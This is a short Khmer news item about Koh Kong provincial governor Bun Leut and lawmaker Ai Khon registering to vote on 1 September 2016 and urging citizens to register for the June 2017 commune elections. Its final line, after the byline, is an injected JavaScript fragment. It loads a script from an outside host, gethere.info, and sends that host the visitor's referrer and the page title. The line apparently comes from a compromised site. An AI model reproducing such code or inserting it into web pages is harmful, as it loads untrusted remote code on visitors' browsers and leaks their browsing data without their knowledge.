ឯកឧត្ដមប៊ុន លើត អភិបាលខេត្តនិងឯកឧត្ដមអាយ ខន ដំណាងរាស្រ្តអញ្ជើញចុះឈ្មោះបោះឆ្នោតនៅសាលាសង្កាត់ស្មាច់មានជ័យ
កោះកុង៖នៅព្រឹកថ្ងៃដំបូង (០១ កញ្ញា ឆ្នាំ២០១៦) គេសង្កេតឃើញថា មានវត្តមានថ្នាក់ដឹកនាំ ក្នុងខេត្តអញ្ជើញទៅ ចុះឈ្មោះបោះឆ្នោត នៅការិយាល័យសាលាសង្កាត់ស្មាច់មានជ័យ.ក្រុងខេមរ:ភូមិន្ទ ឯកឧត្ដម អភិបាលខេត្តកោះកុង ប៊ុនលើត,ព្រមទាំងលោកជំទាវនិងឯកឧត្ដម អាយ ខនតំណាងរាស្រ្តព្រមទាំងប្រជាពលរដ្ឋ ជាច្រើននាក់ ដោយទឹកមុខ សប្បាយរីករាយ។
ឆ្លៀតឱកាសនោះដែរ.ឯកឧត្ដមអភិបាលប៊ុន លើត និងឯកឧត្ដមអាយ ខន ដំណាងរាស្រ្តសំណូមពរដល់បងប្អូនប្រជាពលរដ្នទាំអស់មកចុះឈ្មោះបោះឆ្នោតអោយបានគ្រប់ៗៗៗគ្នាដើម្បីមានសិទ្ធជ្រើសរើសក្រុមប្រឹក្សាឃុំសង្កាត់នៅថ្ងៃទី04ខែមិថុនាឆ្នាំ2017ខាងមុខ។
គួរបញ្ជាក់ថា តាមការឲ្យដឹង ពីមន្ត្រីចុះឈ្មោះបោះឆ្នោតថា ប្រជាពលរដ្ឋ ដែលមានអត្តសញ្ញាណប័ណ្ណនៅមូលដ្ឋានណា ពួកគាត់ទៅចុះឈ្មោះ នៅការិយាល័យនោះ ហើយការចុះឈ្មោះ ទៀតសោធន៍ គឺធ្វើឡើងតាមប្រព័ន្ធកុំព្យូទ័រ៕ ដោយ លោក៖ វណ្ណឌី
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;